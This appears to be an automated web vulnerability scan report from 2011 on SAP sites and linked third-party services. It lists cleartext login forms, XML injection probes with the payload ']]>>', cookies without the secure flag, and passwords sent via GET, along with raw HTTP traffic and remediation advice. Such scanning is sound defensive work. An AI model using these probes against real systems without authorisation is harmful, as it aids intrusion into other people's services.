GET /irj/scn/logon HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:04:50 GMT Content-Length: 21956 Connection: close Set-Cookie: PortalAlias=scn; Path=/
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/sdn/logon
The form contains the following password field:
j_password
Request
GET /irj/sdn/logon HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:04:54 GMT Content-Length: 21956 Connection: close Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sdn.sap.com/irj/sdn/mypoints
The form contains the following password field:
j_password
Request
GET /irj/sdn/mypoints HTTP/1.1 Host: www.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA== Expires: 0 Date: Sat, 15 Oct 2011 15:05:10 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/ Content-Length: 44998
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 15 Oct 2011 14:23:01 GMT Connection: close Connection: Transfer-Encoding P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 15 Oct 2011 14:23:01 GMT Connection: close Connection: Transfer-Encoding P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" Content-Length: 231
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 15 Oct 2011 14:23:01 GMT Connection: close Connection: Transfer-Encoding P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" Content-Length: 231
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:15:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com TS: 0 205 dc4_ird Pragma: no-cache Expires: Sat, 15 Oct 2011 15:15:24 GMT Cache-Control: no-cache, private, must-revalidate Content-Length: 45 Accept-Ranges: bytes Tracking-Status: fpc site tracked Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1 Accept: application/javascript, */*;q=0.8 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Referer: https://www.sap.com/sme/contactsap/index.epx Host: sales.liveperson.net Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:27:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT Content-Length: 46014 Content-Type: application/x-javascript Set-Cookie: ASPSESSIONIDASQTAASD=EFCBMEDCJGOGKJJDOJPEIKJJ; path=/ Cache-control: public, max-age=3600, s-maxage=3600
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://www.sap.com/sme/contactsap/index.epx Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: sales.liveperson.net If-Modified-Since: Tue, 11 Oct 2011 14:31:36 GMT Connection: Keep-Alive Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:27:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT Content-Length: 46014 Content-Type: application/x-javascript Set-Cookie: ASPSESSIONIDSQQSRQRS=KCFLHIDCADKIDENMHBAIHMGO; path=/ Cache-control: public, max-age=3600, s-maxage=3600
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: sapphire-nowmadrid.sapevents.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.0 Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/ Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/ X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:35:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><script type="text/jav ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wiki/display/HOME HTTP/1.1 Host: wiki.sdn.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20 sdn_uid: Guest sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD sdn_visit: QUMxMDU0MDgtMTMzMDgxNzBFNTktQUNBQzA5QTU4MkExRkM0NA== Content-Type: text/html;charset=UTF-8 Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT x-confluence-request-time: 1318690688602 x-confluence-cluster-node: Member(Id=1, Timestamp=2011-10-09 03:06:04.333, Address=172.16.84.8:8088, MachineId=59400, Location=process:23847@spwdfvml0204) Location: https://wiki.sdn.sap.com:443/wiki/display/HOME/FAQ Content-Length: 1751 Vary: Accept-Encoding Date: Sat, 15 Oct 2011 14:58:08 GMT Connection: close Set-Cookie: saplb_*=(J2EE8243320)8243350; Version=1; Path=/ Set-Cookie: JSESSIONID=8zWp1LE9zVQKhsRFGYO-DyFbDhcIMwGWyH0A_SAPgKRDRzD6Pucfy_Alqw7AWMYs; Version=1; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>302 Found</title> <style> td {font-family : Arial, Tahoma, Helvetica, sans-serif; font-size : 14px;}
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=953043236838-236721785208&protV=20&lpjson=1&id=2404879032&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: https://www.sap.com/sme/contactsap/index.epx Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: sales.liveperson.net Connection: Keep-Alive Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:27:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986 Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sat, 15 Oct 2011 15:27:11 GMT Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986 Content-Length: 33211
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: training.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /WebResource.axd HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html Location: /errorpage.epx Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:25 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:25 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:04:25 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/errorpage.epx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactsap/contact_warning.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3471 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:04 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:04 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:04:31 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactsap/index.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 126 Content-Type: text/html; charset=utf-8 Location: /host.epx Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:01 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:01 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:04:01 GMT; path=/ Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/ Set-Cookie: pmelayerurl=%2fcontactsap%2findex.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:04:04 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/host.epx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/login.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 126 Content-Type: text/html; charset=utf-8 Location: /host.epx Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:40 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:40 GMT; path=/ Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/ Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:03:39 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/host.epx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/warning.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 5057 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:03:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the secure flag set:
SDNSTATE=526651564.14340.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 14:21:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sat, 15 Oct 2011 14:21:18 GMT Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 119
HTTP/1.1 302 Moved Temporarily Date: Sat, 15 Oct 2011 14:55:46 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986 Location: http://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155 Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:13:51 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sat, 15 Oct 2011 15:13:52 GMT Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986 Content-Length: 119
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET / HTTP/1.1 Host: www.sapbusinessoptimizer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:04:28 GMT Server: Apache Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 12285
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Home</title> <meta ...[SNIP]... </ul>
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Date: Sat, 15 Oct 2011 15:15:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com TS: 0 205 dc4_ird Pragma: no-cache Expires: Sat, 15 Oct 2011 15:15:24 GMT Cache-Control: no-cache, private, must-revalidate Content-Length: 45 Accept-Ranges: bytes Tracking-Status: fpc site tracked Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.sap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 301 Moved Permanently Set-Cookie: nwt=wetnow; path=/ Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/ Cache-Control: private Content-Length: 0 Location: /index.epx Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:42 GMT; path=/ Set-Cookie: session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; domain=.sap.com; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:42 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 14:20:42 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://store.businessobjects.com/store/bobjamer ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily Date: Sat, 15 Oct 2011 14:55:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986 Set-Cookie: LivePersonID=-546022977410-1318690536:-1:-1:-1:-1; expires=Sun, 14-Oct-2012 14:55:47 GMT; path=/hc/37021986; domain=.liveperson.net Location: https://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155 Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 15 Oct 2011 15:28:16 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Sat, 15-Oct-2011 15:27:56 GMT Content-Type: image/gif Pragma: no-cache Cache-Control: no-cache Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlOTlhNDE4NDgyNjQ1NTQiLCB0cnVlXSwgIjc5IjogWyIyN2EzZjEzOWQ4ZmUyYjYzN2Y0Njg0N2UwOTI1N2NhYiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sun, 14-Oct-2012 15:28:16 GMT; Path=/ Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: training.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
